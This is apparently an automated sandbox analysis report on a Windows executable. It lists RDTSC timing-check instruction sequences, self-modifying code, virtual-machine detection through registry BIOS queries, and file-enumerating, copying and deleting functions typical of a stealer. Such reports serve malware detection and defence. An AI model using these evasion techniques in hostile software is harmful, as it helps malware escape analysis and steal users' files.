Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E00C2 second address: 12E00FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6778CEBE50h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jp 00007F6778CEBE46h 0x00000012 jmp 00007F6778CEBE54h 0x00000017 jp 00007F6778CEBE46h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E00FA second address: 12E0124 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jl 00007F67787C0188h 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F67787C0193h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E0124 second address: 12E0128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E47FB second address: 12E4801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1203A8A second address: 1203A8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E94D2 second address: 12E94D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E94D7 second address: 12E94E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F6778CEBE46h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E94E5 second address: 12E94EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E9393 second address: 12E939D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EBF48 second address: 12EBF54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F67787C0186h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EBF54 second address: 12EBF58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F40CD second address: 12F40D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F40D1 second address: 12F40EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6778CEBE50h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F40EA second address: 12F4109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F67787C0199h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F2C16 second address: 12F2C50 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6778CEBE46h 0x00000008 jmp 00007F6778CEBE58h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6778CEBE56h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F2F12 second address: 12F2F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F3085 second address: 12F308B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F308B second address: 12F3097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F3230 second address: 12F3236 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F3236 second address: 12F323D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F323D second address: 12F3243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F33A8 second address: 12F33B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F86E5 second address: 12F871D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6778CEBE59h 0x00000009 jmp 00007F6778CEBE56h 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F8409 second address: 12F840F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1309971 second address: 1309977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13097F0 second address: 13097F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132BCC8 second address: 132BCCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132BCCC second address: 132BCD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132BCD0 second address: 132BCEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6778CEBE55h 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132C502 second address: 132C506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132C506 second address: 132C50A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132C50A second address: 132C510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132C510 second address: 132C522 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6778CEBE4Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132C522 second address: 132C542 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop ebx 0x00000014 jno 00007F67787C018Ch 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132F83F second address: 132F844 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132F8FE second address: 132F904 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132F904 second address: 132F918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F6778CEBE46h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132F918 second address: 132F91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132F91C second address: 132F932 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132FBCA second address: 132FBD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1330D36 second address: 1330D4A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jl 00007F6778CEBE50h 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1334217 second address: 133421B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 133421B second address: 1334251 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6778CEBE51h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jg 00007F6778CEBE46h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F6778CEBE55h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1334251 second address: 1334256 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1334256 second address: 1334263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jl 00007F6778CEBE4Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0318 second address: 55F032A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F67787C018Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F03E6 second address: 55F0406 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0406 second address: 55F040C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F040C second address: 55F0479 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c mov ah, F2h 0x0000000e pushfd 0x0000000f jmp 00007F6778CEBE4Fh 0x00000014 and ch, FFFFFF8Eh 0x00000017 jmp 00007F6778CEBE59h 0x0000001c popfd 0x0000001d popad 0x0000001e mov di, ax 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F6778CEBE59h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1249E27 second address: 1249E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1249FDE second address: 1249FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1249FE2 second address: 1249FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1249FEC second address: 1249FFE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F6778CEBE46h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1249FFE second address: 124A008 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 108FA62 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 123D515 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 12697D9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 124ED80 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 12CD573 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Found evaded block containing many API calls

Source: C:\Users\user\Desktop\file.exe

Evaded block: after key decision

Found evasive API chain (date check)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetSystemTime,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\file.exe

API coverage: 4.7 %

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E518A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_00E518A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E53910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E53910
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E51269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E51269
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E51250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E51250
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E5E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_00E5E210
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E5CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_00E5CBE0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E523A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	1_2_00E523A9
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E4DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E4DB80
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E52390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,	1_2_00E52390
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E4DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E4DB99
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E54B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	1_2_00E54B29
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E54B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E54B10
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E5DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,	1_2_00E5DD30
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E5D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E5D530
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E416A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_00E416A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E416B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	1_2_00E416B9

Source: C:\Users\user\Desktop\file.exe

1_2_00E61BF0

